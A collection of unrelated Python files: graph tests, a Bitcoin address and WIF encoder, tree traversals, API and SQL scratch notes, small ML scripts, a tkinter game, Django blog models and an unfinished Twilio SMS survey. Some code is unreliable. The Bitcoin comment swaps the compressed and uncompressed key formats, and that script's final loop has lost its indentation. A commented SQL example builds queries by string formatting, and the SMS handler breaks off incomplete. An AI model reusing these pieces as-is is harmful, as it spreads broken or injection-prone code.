    err_msgs = {"path_file": "Error: The path to file was sent! Change to folder path not file path.",
                "dir_not_exist": "Error: The directory does not exist",
                "empty_string": "Error: The string is empty"}
    if args.f:
        main(path=args.f)
    else:
        if os.path.isfile(args.p):
            print(err_msgs['path_file'])
            logger.debug(err_msgs['path_file'])
            sys.exit(1)
        if not os.path.exists(args.p):
            raise OSError(err_msgs['dir_not_exist'])
        # Get a list of files to process
        files = glob(args.p + "/**/*.txt", recursive=True)
        # Create a pool of processes. One for each CPU.
        with concurrent.futures.ProcessPoolExecutor() as executor:
            # Consume the result iterator so any exception raised inside a
            # worker is re-raised here. The original discarded an un-iterated
            # zip() of the results, silently swallowing worker failures.
            for _ in executor.map(main, files):
                pass
|
from graph import Graph, Node
import unittest
__author__ = 'nikita'
class TestNode(unittest.TestCase):
    """Unit tests for graph.Node."""
    def setUp(self):
        self.node = Node()
    def test_is_last_false(self):
        """A node with an unmarked successor is not last."""
        next_node = Node()
        self.node.connects.update({50: next_node})
        result = self.node.is_last()
        self.assertFalse(result)
    def test_is_last_true(self):
        """A node whose only successor is already marked counts as last."""
        next_node = Node()
        next_node.mark = 50
        self.node.connects.update({50: next_node})
        result = self.node.is_last()
        self.assertTrue(result)
    def test_is_last_empty(self):
        """A node with no successors is last."""
        result = self.node.is_last()
        self.assertTrue(result)
    def test_add_connect_error(self):
        """add_connect with a None node is expected to raise TypeError.

        Bug fix: the original called assertRaises(..., method, args=(value, None)),
        which forwards args= as a *keyword argument* to add_connect -- the
        TypeError came from the unexpected keyword, not from the code under
        test. Positional forwarding exercises the real contract.
        """
        self.assertRaises(TypeError, self.node.add_connect, 50, None)
    def test_add_connect_ok(self):
        value = 50
        self.node.add_connect(value, Node())
        self.assertTrue(self.node.connects[value])
        self.assertTrue(isinstance(self.node.connects[value], Node))
    def test_str_ok(self):
        self.node.name = 5
        string = str(self.node)
        self.assertEqual(string, '[5]')
class TestGraph(unittest.TestCase):
    """Unit tests for graph.Graph."""
    def setUp(self):
        self.graph = Graph()
    def test_fill_nodes_ok(self):
        """fill_nodes(n) must create exactly n Node instances."""
        expected_count = 3
        self.graph.fill_nodes(3)
        self.assertEqual(len(self.graph.nodes), expected_count)
        for created in self.graph.nodes:
            self.assertTrue(isinstance(created, Node))
    def test_dejkstra_algorithm_ok(self):
        """Dijkstra marks each reachable node with its shortest distance."""
        self.graph.fill_nodes(4)
        nodes = self.graph.nodes
        # Edges: 0 -(10)-> 1 -(10)-> 2 plus a direct 0 -(15)-> 2; node 3 is isolated.
        nodes[0].add_connect(10, nodes[1])
        nodes[1].add_connect(10, nodes[2])
        nodes[0].add_connect(15, nodes[2])
        self.graph.dejkstra_algorithm(nodes[0])
        # Shortest paths: start 0; via edges 10 and 15; unreachable stays None.
        self.assertEqual(nodes[0].mark, 0)
        self.assertEqual(nodes[1].mark, 10)
        self.assertEqual(nodes[2].mark, 15)
        self.assertEqual(nodes[3].mark, None)
    def test_str_empty(self):
        """An empty graph renders as the empty string."""
        self.assertEqual(str(self.graph), '')
    def test_str_ok(self):
        """A non-empty graph renders to a truthy (non-empty) string."""
        self.graph.fill_nodes(1)
        self.assertTrue(str(self.graph))
if __name__ == '__main__':
    # Discover and run every TestCase in this module.
    unittest.main()
|
# Smoke test for the SWIG smart-pointer-typedef wrapper: writes through the
# proxy object and through the dereferenced pointer must both be observable
# via getx(). Presumably Bar forwards attribute access to the wrapped Foo
# (smart-pointer semantics) -- confirm against the SWIG interface file.
from smart_pointer_typedef import *
f = Foo()
b = Bar(f)
# Write through the smart-pointer proxy, read back through it.
b.x = 3
if b.getx() != 3:
    raise RuntimeError
# __deref__ exposes the underlying Foo; writes must round-trip as well.
fp = b.__deref__()
fp.x = 4
if fp.getx() != 4:
    raise RuntimeError
|
#coding=utf-8
#print('''
# +----------+
# +-----+ | |RIPEMD160(SHA256(.))结果记为 HASH
# |公钥P| | V
# +-----+ | +----+------+
# | ^ |0x00| HASH | --> SHA256
# V | +----+------+ |
# SHA256 | \ \ V
# | | \ \ SHA256
# V | \记为P_HASH \ |取前4字节记为Check
# RIPEMD160 | \ \ V
# | | +----+------+-----+
# +--->---+ |0x00| HASH |Check| --> BASE58 编码 --> 比特币地址
# +----+------+-----+ 记为 OUT
# 记为 IN
# 比特币地址(钱包地址)生成
# (1)私钥 --> 公钥P=(X,Y)
# 为后续计算方便, 公钥P保存为下列两种16进制格式
# 压缩格式 P = 04 X Y
# 非压缩格式 P = 02/03 X -- 02:Y为偶数 03:Y为奇数
# (2) HASH = RIPEMD160(SHA256(P))
# (3) P_HASH = 0x00 | HASH
# (4) Check = SHA256(SHA256(P_HASH))
# (5) IN = P_HASH | Check
# (6) OUT = BASE58(IN)
#''')
import sys, hashlib
from hashlib import sha256
import binascii as B
if __name__ == '__main__':
    # Usage/help screen: shown unless exactly two CLI arguments were supplied
    # (mode keyword + key material). Printed text is left verbatim.
    if len(sys.argv) != 3:
        print('使用方法:', sys.argv[0], 'pub 公钥信息(P=04|X|Y 或 02|X 或 03|X)') # condition 1
        print('       ', sys.argv[0], 'pri 私钥信息(P=K)') # condition 3
        print('       ', sys.argv[0], 'pri-c 私钥信息(P=K)') # condition 2
        print()
        print('       ', sys.argv[0], 'hash XXXX -- 由公钥中间值XXXX生成公钥的比特币地址') # condition 4
        print('       ', ' '*len(sys.argv[0]), ' 其中, XXXX=RIPEMD160(SHA256(P))')
        print()
        print('示 例:', sys.argv[0], 'pub 046639E8E50A89C27CB21EA2B3D8E6E39541B92BACBB6CEC1A32E6A0B91D008E7F035AFA91410C69A0309E423027C6FB631F498E07A996FA177DC575F49F251924')
        print('       ', ' '*len(sys.argv[0]),' | ---------------------------- X ----------------------------- || ---------------------------- Y ----------------------------- |')
        print()
        print('       ', sys.argv[0], 'pub 0202a406624211f2abbdc68da3df929f938c3399dd79fac1b51b0e4ad1d26a47aa # 公钥:压缩格式')
        print('       ', ' '*len(sys.argv[0]),' | ---------------------------- X ----------------------------- |')
        print()
        print('       ', sys.argv[0], 'pri B5A948BD1650CB7FA30E5E820B54265E4963CF6591AE7CCE5F4EE8D1BA62132C # 私钥:WIF 未压缩格式')
        print('       ', ' '*len(sys.argv[0]),' | ---------------------------- K ----------------------------- |')
        print()
        print('       ', sys.argv[0], 'pri-c B5A948BD1650CB7FA30E5E820B54265E4963CF6591AE7CCE5F4EE8D1BA62132C # 私钥:WIF 压缩格式')
        print('       ', ' '*len(sys.argv[0]),' | ---------------------------- K ----------------------------- |')
        exit()
    # Decide the working mode from the first CLI argument:
    #   1 = public key  -> Bitcoin address
    #   2 = private key -> WIF-compressed
    #   3 = private key -> WIF (the fall-through default, i.e. plain 'pri')
    #   4 = address from a precomputed HASH160 intermediate value
    # Order matters: 'pri-c' must be tested before the 'pri' fall-through.
    if sys.argv[1].startswith('pub') :
        key_flag = 1
    elif sys.argv[1].startswith('pri-c') :
        key_flag = 2
    elif sys.argv[1].startswith('hash') :
        key_flag = 4
    else :
        key_flag = 3
    # Modes 1/2/3: argv[2] is hex key material; compute HASH160 = RIPEMD160(SHA256(key)).
    if key_flag != 4 :
        Key = B.a2b_hex(sys.argv[2])
        temp = hashlib.new('sha256', Key).digest()
        HASH = hashlib.new('ripemd160', temp).digest()
        # NB: 'bytes' shadows the builtin name; kept as-is for compatibility.
        # str(b'..')[2:-1] strips the b'...' repr wrapper to print plain hex.
        bytes = B.b2a_hex(temp)
        print('Sha256(Key) :', str(bytes)[2:-1])
        bytes = B.b2a_hex(HASH)
        print('HASH: ', str(bytes)[2:-1], " -- HASH = Ripemd160(Sha256(Key))")
    # Mode 4: argv[2] already IS the HASH160 intermediate value.
    else :
        HASH = B.a2b_hex(sys.argv[2])
        bytes = B.b2a_hex(HASH)
        print('HASH: ', str(bytes)[2:-1], " -- HASH = Ripemd160(Sha256(Key))")
    # Build the Base58Check payload (version byte + key material) per mode.
    if key_flag == 1 or key_flag == 4 :
        # Address payload: mainnet version byte 0x00 in front of HASH160.
        P_HASH = b'\x00' + HASH
        bytes = B.b2a_hex(P_HASH)
        print('P_HASH: ', str(bytes)[2:-1], ' -- P_HASH = 0x00 | HASH')
    elif key_flag == 3 :
        P_HASH = b'\x80' + Key
        # Add a 0x80 byte in front of it for mainnet addresses
        bytes = B.b2a_hex(P_HASH)
        print('P_HASH:', str(bytes)[2:-1], '-- P_HASH = 0x80 | Prikey')
    elif key_flag == 2:
        P_HASH = b'\x80' + Key + b'\x01'
        # Add a 0x80 byte in front of it for mainnet addresses
        # Also add a 0x01 byte at the end if the private key will correspond to a compressed public key
        bytes = B.b2a_hex(P_HASH)
        print('P_HASH:', str(bytes)[2:-1], '-- P_HASH = 0x80 | Prikey | 0x01')
temp = hashlib.new('sha256', P_HASH).digest()
Check = hashlib.new('sha256', temp).digest()
bytes = B.b2a_hex(Check)
print('Check: ', str(bytes)[2:10], '-- Check = SHA256(SHA256(P_HASH))[0:4]')
temp = P_HASH + Check[0:4]
bytes = B.b2a_hex(temp)
print('BASE58_IN: ', str(bytes)[2:-1])
# base58 encode
# code_string = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# x = convert_bytes_to_big_integer(BASE58_IN)
# output_string = ""
# while(x > 0)
# {
# (x, remainder) = divide(x, 58)
# output_string.append(code_string[remainder])
# }
# repeat(number_of_leading_zero_bytes_in_hash)
# {
# output_string.append(code_string[0]);
# }
# output_string.reverse();
# 核心:将 BASE58_IN 看作一个大整数,表示成以58为基数的数
code_string = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
x = int(str(bytes)[2:-1], 16)
output_string = ''
while(x > 0) :
(x, remainder) = divmod(x, 58)
output_string = output_string + code_string[remainder]
if key_flag == 1 :
print('BASE58_OUT:', '1'+output_string[::-1])
elif key_flag == 2 :
print('BASE58_OUT:', output_string[::-1], '-- WIF-compressed')
else :
print('BASE58_OUT:', output_string[::-1], '-- WIF') |
'''
94. Binary Tree Inorder Traversal
Given a binary tree, return the inorder traversal of its nodes' values.
Example:
Input: [1,null,2,3]
1
\
2
/
3
Output: [1,3,2]
Follow up: Recursive solution is trivial, could you do it iteratively?
'''
# Solution -1 Iterative
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def inorderTraversal(self, root):
        """
        Iterative inorder traversal using an explicit stack.

        :type root: TreeNode
        :rtype: List[int]

        Fixes: identity comparison with None (`is None`, not `== None`) and
        idiomatic truthiness for the stack-emptiness check.
        """
        if root is None:
            return []
        _inorder = []
        stack = []
        curr = root
        while curr is not None or stack:
            # Walk down the left spine, saving nodes to revisit on the way up.
            while curr is not None:
                stack.append(curr)
                curr = curr.left
            curr = stack.pop()
            _inorder.append(curr.val)
            curr = curr.right
        return _inorder
# Solution-2 Recurrsive
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def inorderTraversal(self, root):
        """
        Recursive inorder traversal (left, node, right).

        :type root: TreeNode
        :rtype: List[int]

        Fix: identity comparison with None (`is None`, not `== None`).
        """
        _inorder = []
        def _visit(node):
            # Closure appends into _inorder; recursion depth is tree height.
            if node is None:
                return
            _visit(node.left)
            _inorder.append(node.val)
            _visit(node.right)
        _visit(root)
        return _inorder
# Solution - 3 Threaded Binary Approach
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def inorderTraversal(self, root):
        """
        Inorder traversal via right-threading, O(1) extra space.
        DESTRUCTIVE: consumed left links are cut (set to None), so the
        input tree is flattened while being traversed.

        :type root: TreeNode
        :rtype: List[int]
        """
        _inorder = []
        curr = root
        while curr != None:
            if curr.left == None:
                # No left subtree: visit, then follow the (possibly threaded) right link.
                _inorder.append(curr.val)
                curr= curr.right
            else:
                # Find the rightmost node of the left subtree ...
                prev = curr.left
                while prev.right != None:
                    prev=prev.right
                # ... thread it back to the current node, then descend left.
                prev.right = curr
                tmp = curr
                curr= curr.left
                # Severing the left link prevents revisiting the subtree.
                tmp.left = None
        return _inorder
# Solution -4 Threaded Binary (Morris Traversal)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def inorderTraversal(self, root):
        """
        Morris-style inorder traversal, O(1) extra space; also DESTRUCTIVE
        (consumed left links are severed rather than unthreaded).

        :type root: TreeNode
        :rtype: List[int]
        """
        _inorder = []
        curr = root
        while curr != None:
            if curr.left == None:
                # Leaf-on-the-left side: visit and follow the (maybe threaded) right link.
                _inorder.append(curr.val)
                curr= curr.right
            else:
                # Locate the inorder predecessor (rightmost node of left subtree).
                prev = curr.left
                while prev.right != None:
                    prev=prev.right
                # Thread predecessor back to curr, step into the left subtree,
                # and cut the original left link so it is not revisited.
                prev.right = curr
                curr = prev.right.left
                prev.right.left = None
        return _inorder
|
'''
#Obtenemos el historial de datos de una unidad
response = dashboard.sm.getNetworkSmDeviceCellularUsageHistory(
network_id,
device_id
)
'''
'''
#Obtenemos el historial de conectividad del telefono
response = dashboard.sm.getNetworkSmDeviceConnectivity(
network_id,
device_id,
total_pages='all',
direction='next'
)
'''
'''
###Eliminar un elemento del diccionario###
car = {
"a" : 1,
"b" : 2,
"c" : 3,
"d" : 4
}
print(car)
car.pop("c")
car_json = json.dumps(car,indent=4)
print(car_json)
'''
'''
#Insertar datos en la base de datos
from pydatabase import conexion
try:
with conexion.cursor() as cursor:
consulta = "INSERT INTO peliculas(titulo, anio) VALUES (?, ?);"
# Podemos llamar muchas veces a .execute con datos distintos
cursor.execute(consulta, ("Volver al futuro 1", 1985))
cursor.execute(consulta, ("Pulp Fiction", 1994))
cursor.execute(consulta, ("It", 2017))
cursor.execute(consulta, ("Ready Player One", 2018))
cursor.execute(consulta, ("Spider-Man: un nuevo universo", 2018))
cursor.execute(consulta, ("Avengers: Endgame", 2019))
cursor.execute(consulta, ("John Wick 3: Parabellum", 2019))
cursor.execute(consulta, ("Toy Story 4", 2019))
cursor.execute(consulta, ("It 2", 2019))
cursor.execute(consulta, ("Spider-Man: lejos de casa", 2019))
except Exception as e:
print("Ocurrió un error al insertar: ", e)
finally:
conexion.close()
'''
'''
#Insertar varias columnas al mismo tiempo
from pydatabase import conexion
try:
with conexion.cursor() as cursor:
query = "INSERT INTO peliculas(titulo,anio) VALUES(?, ?)"
valores = [
('TEST', 123),
('TEST2', 12),
('TEST3', 987),
]
cursor.executemany(query, valores)
conexion.commit()
print("Se inserto con exito")
except Exception as e:
print("Error al ingresar datos: ",e)
finally:
conexion.close()
'''
# Insertar informacion desde un dict
# from pydatabase import conexion
# try:
# with conexion.cursor() as cursor:
# valores = [
# {
# 'titulo': 'ff',
# 'anio': 1999
# },
# {
# 'titulo': 'fffff',
# 'anio': 7854
# }
# ]
# #print(valores)
# for dict in valores:
# values = ', '.join("'" + str(x).replace('/', '_') + "'" for x in dict.values())
# sql = "INSERT INTO %s (titulo,anio) VALUES ( %s );" % ('peliculas', values)
# print(sql)
# cursor.execute(sql)
# cursor.commit()
# print("Se ingreso con exito")
# except Exception as e:
# print("Error al ingresar datos: ",e)
# finally:
# conexion.close()
# Combinar dos dicts
# dict1 = [
# {
# 'Titulo': 'Juano',
# 'Edad': 23
# },
# {
# 'Titulo': 'Banano',
# 'Edad': 20
# }
#
# ]
# dict2 = [
# {
# 'Direccion': 'EDOMEX',
# 'Telefono': 5521190023
# },
# {
# 'Direccion': 'CDMX',
# 'Telefono': 5514691810
# }
# ]
# for key in dict1:
# for key2 in dict2:
# key.update(key2)
# print(key)
#Fechas con Python
# from datetime import datetime
#
# date = {
# 'received_on': str(datetime.now())
# }
# print(date)
# Sustituir un valor de un key
# response_data = [
# {
# 'received': 7156,
# 'sent': 2081,
# 'ts': '2020-10-28T00:00:00.000000Z'
# },
# {'received': None, 'sent': None, 'ts': '2020-10-29T00:00:00.000000Z'},
# {'received': 1010, 'sent': 288, 'ts': '2020-10-30T00:00:00.000000Z'},
# {'received': 540, 'sent': None, 'ts': '2020-11-04T00:00:00.000000Z'},
# {'received': 18742, 'sent': None, 'ts': '2020-11-05T00:00:00.000000Z'}
# ]
# for i in response_data:
# if i['received'] == None:
# i.update(received='null')
# if i['sent'] == None:
# i.update(sent='null')
#
# print(i)
# Timestamp to datetime
# from datetime import datetime
# timestamp = 1606190465
# new_date = datetime.fromtimestamp(timestamp)
# print(new_date)
# Local time to UTC time
# import pytz, datetime
# local = pytz.timezone("America/Los_Angeles")
# naive = datetime.datetime.strptime("2001-2-3 10:11:12", "%Y-%m-%d %H:%M:%S")
# local_dt = local.localize(naive, is_dst=None)
# utc_dt = local_dt.astimezone(pytz.utc)
# print(utc_dt)
#Prueba de cambio de formato de fechas a UTC
from datetime import datetime
import pytz
# Sample of the device records returned by the dashboard API; lastConnected
# is a Unix timestamp that we want expressed as an aware UTC datetime.
response = [
    {
        'id': '584342051651885713',
        'batteryEstCharge': '85',
        'lastConnected': 1606192497,
        'cellularDataUsed': 6457,
        'location': 'Dr. R. Michel 1310, Mirador',
        'Received_On': '2020-11-23 22:15:33.047195'
    },
    {
        'id': '584342051651885713',
        'batteryEstCharge': '85',
        'lastConnected': 1606192497,
        'cellularDataUsed': 6457,
        'location': 'Dr. R. Michel 1310, Mirador',
        'Received_On': '2020-11-23 22:15:33.047195'
    }
]
for key in response:
    # Convert the lastConnected epoch seconds to an aware UTC datetime.
    timestamp = key['lastConnected']
    new_date = datetime.fromtimestamp(timestamp)  # naive, in the LOCAL timezone
    stamp_utc = new_date.astimezone(pytz.utc)     # interpret as local, convert to UTC
    key.update(lastConnected=stamp_utc)
    print(key)
|
from sklearn import tree
# Toy fruit classifier: weight (grams) + texture -> apple/orange.
# Feature encoding: 1 = smooth, 0 = bumpy. Label encoding: 0 = apple, 1 = orange.
#features =[[140, "smooth"], [130,"smooth"], [150, "bumpy"], [170, "bumpy"]]
#lables = ["apple", "apple", "orange", "orange"]
features = [[140, 1], [130, 1], [150, 0], [170, 0]]
labels = [0, 0, 1, 1]
clf = tree.DecisionTreeClassifier()
clf = clf.fit(features, labels)
# print() as a function: the original Python 2 print statement is a
# SyntaxError on Python 3; the call form works on both.
print(clf.predict([[150, 0]]))
|
# make a table of ASCII values of upper and lower-case alphabet
# fileU.txt = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# fileL.txt = 'abcdefghijklmnopqrstuvwxyz'
# Use a context manager so the file is always closed (the original leaked
# the handle). Output is unchanged: one "char :<TAB> code" line per byte.
with open("fileL.txt") as file:
    while True:
        char = file.read(1)
        if not char:
            break
        # char is a single character, so the original inner for-loop was
        # redundant; print it with its ordinal directly.
        print(char, ":\t", ord(char))
|
import os
import re
import time
import pickle
import pyprind
import joblib
import numpy as np
import emoji
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
from nltk.corpus import stopwords
stop = stopwords.words('english')
def tokenizer(text):
    """Strip HTML tags, lower-case, normalise punctuation to spaces, and
    drop stop words; return the list of remaining tokens.

    Bug fix: the original ran re.sub('[\\W+]', '', ...) AFTER replacing
    punctuation with spaces, which deleted those spaces again and glued the
    whole document into a single token. A single pass that collapses every
    non-alphanumeric run to one space preserves the word boundaries.
    """
    # Remove HTML markup such as <br />.
    text = re.sub(r'<[^>]*>', '', text)
    # Collapse every run of non-alphanumeric characters into one space.
    text = re.sub(r'[^a-zA-Z0-9]+', ' ', text.lower())
    # 'stop' is the NLTK English stop-word list defined at module level.
    return [w for w in text.split() if w not in stop]
def stream_docs(path):
    """Yield (text, label) pairs from the CSV at *path*, skipping the header.

    Each data line is assumed to end with ",<label>\n", so the text is
    everything but the last three characters and the label is the
    second-to-last character.
    """
    with open(path, 'r', encoding='utf-8') as infile:
        next(infile)  # discard the header row
        for line in infile:
            text, label = line[:-3], line[-2]
            yield text, label
def get_minibatch(doc_stream, size):
    """Pull up to *size* (text, label) pairs from *doc_stream*.

    Returns two parallel lists. When the stream is exhausted (or any other
    error occurs) the partial batch collected so far is returned and the
    error text is printed, matching the original best-effort behaviour.
    """
    texts, labels = [], []
    try:
        for _ in range(size):
            text, label = next(doc_stream)
            texts.append(text)
            labels.append(label)
    except Exception as err:
        print(str(err))
    return texts, labels
# Out-of-core training: hashing vectorizer needs no fitted vocabulary, and
# log-loss SGD is online logistic regression (epochs driven manually).
vect = HashingVectorizer(decode_error='ignore',n_features=2**21,preprocessor=None,tokenizer=tokenizer)
clf = SGDClassifier(loss='log',random_state=1,max_iter=1)
doc_stream = stream_docs('movie_data.csv')
pbar = pyprind.ProgBar(45)
classes = np.array([0,1])
# 45 mini-batches of 1000 documents each.
for _ in range(45):
    xtrain,ytrain = get_minibatch(doc_stream,size=1000)
    if not xtrain:
        break
    xtrain = vect.transform(xtrain)
    # NOTE(review): 'classes' above is never used -- partial_fit is given only
    # the classes present in THIS batch, and stream_docs yields *string*
    # labels ('0'/'1'), not the ints in 'classes'. This likely should be
    # classes=classes with integer labels; confirm against movie_data.csv.
    clf.partial_fit(xtrain,ytrain,classes=np.array(list(set(ytrain))))
    pbar.update()
# Hold out the next 5000 documents for evaluation, then fold them in too.
xtest,ytest = get_minibatch(doc_stream,size=5000)
xtest = vect.transform(xtest)
print(clf.score(xtest,ytest))
clf.partial_fit(xtest,ytest)
# Persist the model and the stop-word list for later reuse.
joblib.dump(clf,'classifier.joblib')
joblib.dump(stop,'stopword.joblib')
|
# Programmer - python_scripts (Abhijith Warrier)
# PYTHON GUI GAME WHERE THE PLAYER HAS TO ENTER THE COLOR IN WHICH TEXT IS WRITTEN
# Importing necessary packages
import random
import tkinter as tk
from tkinter import *
from tkinter import messagebox
# Declaring global variables
timeleft = 60 # Setting timeleft variable to 60 seconds
score = 0
# Defining a function to create widgets for the game
def CreateWidgets():
    """Build the static UI on the global root window: instruction label,
    start button, timer/score labels, the colored word label and the answer
    entry. Dynamic widgets are stored as attributes on root so StartGame
    can update them each tick."""
    instLabel = Label(root, text="ENTER COLOR OF THE TEXT", font=('Helvetica',30), background='azure4')
    instLabel.grid(row = 0, column = 0, columnspan = 3, padx=5, pady=15)
    startButton = Button(root, text="START GAME", width=20, font=('Helvetica',15), command=StartGame,
                         background='azure4')
    startButton.grid(row = 1, column = 0,padx = 5,pady = 15, columnspan = 3 )
    root.timeLabel = Label(root, text="TIME LEFT : ", font=('Helvetica',30), background='azure4')
    root.timeLabel.grid(row=2, column=0, padx=5, pady=15)
    root.scoreLabel = Label(root, text="SCORE : "+str(score), font=('Helvetica',30), background='azure4')
    root.scoreLabel.grid(row=2, column=1, padx=5, pady=15)
    root.gameLabel = Label(root, font=('Comic Sans MS',60), background='azure4')
    root.gameLabel.grid(row=3, column=0, padx=5, pady=15, columnspan=2)
    # The entry shares the module-level StringVar so StartGame can read answers.
    root.answerEntry = Entry(root, width=20, font=30, background='SILVER', textvariable=colorText)
    root.answerEntry.grid(row=4, column=0, padx=5, pady=15, columnspan=2)
    root.answerEntry.focus()
# Defining function to start the game
def StartGame():
    """One game tick: decrement the countdown, display a new colored word,
    score the text currently in the entry, and reschedule itself after 1 s."""
    # Countdown and score live at module level so they persist across ticks.
    global timeleft, score
    # Checking if the timeleft is greater than 0. If yes do the following
    if timeleft > 0:
        # Decrementing the timeleft by 1
        timeleft -= 1
        # Displaying the time left in above created label for time left
        root.timeLabel.config(text="TIME LEFT : " + str(timeleft))
        # Creating a list of random colors
        randomColor = ['RED', 'GREEN', 'BLUE', 'VIOLET', 'PINK', 'BROWN', 'BLACK', 'WHITE']
        # Shuffling the list
        random.shuffle(randomColor)
        # Selecting two colors from the shuffled randomColor list and setting
        # One Color as Label Text and the Other Color as Font Color of the text
        root.gameLabel.config(text=str(randomColor[0]), fg=randomColor[1])
        # NOTE(review): the entry is compared against the color that was JUST
        # shuffled and displayed, not the color the player was responding to.
        # Confirm whether scoring one step late like this is intended.
        # Check if the user's input is equal to the Font Color of the text
        if colorText.get().lower() == randomColor[1].lower():
            # If yes increment the score value by 1
            score += 1
            # Displaying the score
            root.scoreLabel.config(text = "SCORE : "+str(score))
        # Clearing the user's entry
        root.answerEntry.delete(0, END)
        # Calling the StartGame function again after 1 second
        root.timeLabel.after(1000, StartGame)
    # If timeleft is equal to 0, then stop the game and display the users's score
    else:
        messagebox.showinfo("TIME UP !","YOUR SCORE IS : "+str(score))
# Create the main application window.
root = tk.Tk()
# Shared variable bound to the answer Entry widget.
colorText = StringVar()
# Window title, background color, and fixed (non-resizable) geometry.
root.title("PythonTextColorGame")
root.configure(background='azure4')
root.resizable(False, False)
# Build the UI; the game itself starts when the START GAME button is pressed.
CreateWidgets()
# Enter the tkinter event loop (blocks until the window is closed).
root.mainloop()
|
from django.db import models
from django.utils import timezone
from django.urls import reverse
from django.utils.html import strip_tags
import markdown
from users.models import MyUser
# Create your models here.
class Category(models.Model):
    """Blog post category (referenced by Post via ForeignKey)."""
    name = models.CharField('类别名称', max_length=100)
    class Meta:
        verbose_name = '分类'
        verbose_name_plural = verbose_name  # Chinese has no plural form; reuse the singular
    def __str__(self):
        return self.name
class Tag(models.Model):
    """Free-form tag (attached to Post via ManyToMany)."""
    name = models.CharField('标签名称', max_length=100)
    class Meta:
        verbose_name = '标签'
        verbose_name_plural = verbose_name  # Chinese has no plural form; reuse the singular
    def __str__(self):
        return self.name
class Post(models.Model):
    """Blog post written in Markdown; excerpt is auto-derived on save."""
    title = models.CharField('标题', max_length=70)
    body = models.TextField('正文')
    created_time = models.DateTimeField('创建时间', default=timezone.now)
    modified_time = models.DateTimeField('修改时间')
    excerpt = models.CharField('摘要', max_length=200, blank=True)
    category = models.ForeignKey(Category, verbose_name='分类', on_delete=models.CASCADE)
    tags = models.ManyToManyField(Tag, verbose_name='标签', blank=True)
    author = models.ForeignKey(MyUser, verbose_name='作者', on_delete=models.CASCADE)
    views = models.PositiveIntegerField('阅读量', default=0, editable=False) # positive-integer read counter, hidden from admin forms
    class Meta:
        verbose_name = '文章' # display name of this model in the Django admin
        verbose_name_plural = verbose_name # Chinese has no plural form, so reuse the singular
        ordering = ['-created_time']
    def save(self, *args, **kwargs):
        """Refresh modified_time and, when no excerpt was provided, derive one
        from the first 54 characters of the rendered (tag-stripped) body."""
        self.modified_time = timezone.now()
        md = markdown.Markdown(extensions=[
            'markdown.extensions.extra',
            'markdown.extensions.codehilite',
        ])
        # Render Markdown to HTML, strip tags, keep the first 54 characters.
        self.excerpt = strip_tags(md.convert(self.body))[:54] if self.excerpt.strip() == '' else self.excerpt
        super().save(*args, **kwargs)
    def increase_views(self):
        """Increment the read counter, persisting only the views column."""
        self.views += 1
        self.save(update_fields=['views']) # write only the views field to the database
    def get_absolute_url(self):
        """Canonical URL for this post (petblog:detail route)."""
        return reverse('petblog:detail', kwargs={'pk': self.pk})
    def __str__(self):
        return self.title
class Comment(models.Model):
    """Reader comment attached to a Post."""
    text = models.TextField('内容')
    created_time = models.DateTimeField('创建时间', default=timezone.now)
    user = models.ForeignKey(MyUser, verbose_name='用户', on_delete=models.CASCADE)
    # Lazy string reference avoids an import-order dependency on Post.
    post = models.ForeignKey('petblog.Post', verbose_name='文章', on_delete=models.CASCADE)
    class Meta:
        verbose_name = '评论'
        verbose_name_plural = verbose_name  # Chinese has no plural form; reuse the singular
    def __str__(self):
        # Show the author plus the first 20 characters of the comment.
        return f'{self.user}:{self.text[:20]}'
|
from flask import Flask, request, redirect
from twilio.twiml.messaging_response import MessagingResponse
app = Flask(__name__)
user_info = dict()
@app.route("/handle_sms", methods=['GET', 'POST'])
def incoming_sms():
    """Send a dynamic reply to an incoming text message.

    Drives a fixed five-question survey per sender. user_info maps the
    sender's phone number to [state, age, profession, living, health, step];
    the trailing step counter selects which question the incoming body
    answers. NOTE(review): module-level dict state is not shared across
    multiple workers/processes -- confirm single-process deployment.
    """
    # Get the message the user sent our Twilio number
    body = request.values.get('Body', None)
    # Start our TwiML response
    resp = MessagingResponse()
    phone_number = request.values.get('From')
    if phone_number in user_info:
        if user_info[phone_number][-1] == 0:
            # check the validity of the state
            user_info[phone_number][0] = body
            resp.message('How old are you? Selection from the age groups below:')
            resp.message('A. 3 to 17')
            resp.message('B. 18 to 30')
            resp.message('C. 31 to 64')
            resp.message('D. 65 and older')
            user_info[phone_number][-1] += 1
        elif user_info[phone_number][-1] == 1:
            # check the validity of the age
            user_info[phone_number][1] = body
            resp.message('What profession are you?')
            resp.message('Are you in Group A? (Yes / No)')
            resp.message('Ambulatory health care \n Assisted living \n Developmental disability facility \n Fire protection services \n Home healthcare services Hospital '
                         'worker \n Nursing/residential care \n Outpatient care \n Pharmacy/drug store \n Physician/health practitioner \n Police')
            user_info[phone_number][-1] += 1
        elif user_info[phone_number][-1] == 2:
            # check the validity of the profession
            user_info[phone_number][2] = body
            resp.message('What is your living situation?')
            resp.message(
                'A. Nursing home/residential care \n B. Home with more people than rooms \n C. Homeless shelter '
                '\n D. Prison/Jail \n E. Group home \n F. Rehab center \n G. None of these')
            user_info[phone_number][-1] += 1
        elif user_info[phone_number][-1] == 3:
            # check the validity of the living condition
            user_info[phone_number][3] = body
            resp.message('Do you have any health conditions?')
            resp.message('A. Obesity \n B. COPD (Chronic obstructive pulmonary disease) \n C. Diabetes \n D. Heart disease \n E. Chronic kidney disease \n F. None of these')
            user_info[phone_number][-1] += 1
        elif user_info[phone_number][-1] == 4:
            # check the validity of the health condition
            user_info[phone_number][4] = body
            resp.message('This is the end of the message.')
    else:
        # First contact from this number: greet and initialise its state slot.
        resp.message('Hi! Welcome to Vaccine Info Estimator, we are going to ask you a series of questions to determine'
                     'your estimated date to receive the vaccine. What state are you in?')
        current_counter = 0
